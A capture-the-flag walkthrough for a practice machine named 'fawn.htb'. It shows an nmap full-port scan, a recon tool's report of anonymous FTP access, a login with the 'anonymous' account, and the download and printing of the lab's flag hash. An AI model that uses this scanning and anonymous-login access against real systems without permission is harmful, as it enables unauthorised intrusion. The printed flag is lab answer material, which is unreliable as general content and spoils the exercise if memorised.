Port recognition withnmapor you can use recon

┌──(root@ghost)-[/home/ghost]
└─# recon fawn.htb

    .o oOOOOOOOo                                            OOOo
    Ob.OOOOOOOo  OOOo.      oOOo.                      .adOOOOOOO
    OboO"""""""""""".OOo. .oOOOOOo.    OOOo.oOOOOOo.."""""""""'OO
    OOP.oOOOOOOOOOOO "POOOOOOOOOOOo.   `"OOOOOOOOOP,OOOOOOOOOOOB'
    `O'OOOO'     `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO'    `OOOOo
    .OOOO'            `OOOOOOOOOOOOOOOOOOOOOOOOOO'            `OO
    OOOOO                 '"OOOOOOOOOOOOOOOO"`                oOO
   oOOOOOba.                .adOOOOOOOOOOba               .adOOOOo.
  oOOOOOOOOOOOOOba.    .adOOOOOOOOOO@^OOOOOOOba.     .adOOOOOOOOOOOO
 OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"`  '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
 "OOOO"       "YOoOOOOMOIONODOO"`  .   '"OOROAOPOEOOOoOY"     "OOO"
    Y           'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?'         :`
    :            .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?         .
    .            oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
                 '%o  OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
                      `$"  `OOOO' `O"Y ' `OOOO'  o             .
    .                  .     OP"          : o     .
                              :
                              .

[R3C0N] by 0bfxgh0st 4 WWA with ❤
B.O.T.N.E.T. created by Binlaab

[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-19 11:41 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:41
Completed NSE at 11:41, 0.00s elapsed
Initiating Ping Scan at 11:41
Scanning fawn.htb (10.129.184.192) [4 ports]
Completed Ping Scan at 11:41, 0.08s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:41
Scanning fawn.htb (10.129.184.192) [65535 ports]
Discovered open port 21/tcp on 10.129.184.192
Completed SYN Stealth Scan at 11:42, 15.16s elapsed (65535 total ports)
NSE: Script scanning 10.129.184.192.
Initiating NSE at 11:42
Completed NSE at 11:42, 0.55s elapsed
Nmap scan report for fawn.htb (10.129.184.192)
Host is up (0.093s latency).
Not shown: 65200 closed tcp ports (reset), 334 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
21/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt

NSE: Script Post-scanning.
Initiating NSE at 11:42
Completed NSE at 11:42, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 16.05 seconds
           Raw packets sent: 75052 (3.302MB) | Rcvd: 71943 (2.878MB)

┌─[+] [ftp]
└─(Credentials for ftp fawn.htb:21)
  [user:ftp][password:]
  [user:anonymous][password:]

recon reports ftp service on port 21 and we obtain valid ftp credentials

┌──(root@ghost)-[/home/ghost]
└─# ftp fawn.htb 21
Connected to fawn.htb.
220 (vsFTPd 3.0.3)
Name (fawn.htb:ghost): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||35145|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |******************************************************************************************************************************************************|    32       11.51 KiB/s    00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (0.42 KiB/s)
ftp> exit
221 Goodbye.
┌──(root@ghost)-[/home/ghost]
└─# cat flag.txt
035db21c881520061c53e0536e44f815